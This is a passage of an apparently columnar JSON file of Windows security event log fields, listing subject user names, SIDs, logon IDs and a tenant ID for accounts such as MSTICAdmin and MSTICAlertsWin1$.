",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\",\"0x3e7\"],\"SubjectUserName\":[\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAdmin\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\",\"MSTICAlertsWin1$\"],\"SubjectUserSid\":[\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-21-996632719-2361334927-4038480536-500\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\",\"S-1-5-18\"],\"TargetLogonId\":[\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0xfaac27\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0xfaac27\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\",\"0x0\",\"0x0\",\"0x3e5\",\"0x0\",\"0x0\",\"0x3e4\",\"0x0\"],\"TenantId\":[\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9d70-404d-832c-2de5e2478eda\",\"802d39e1-9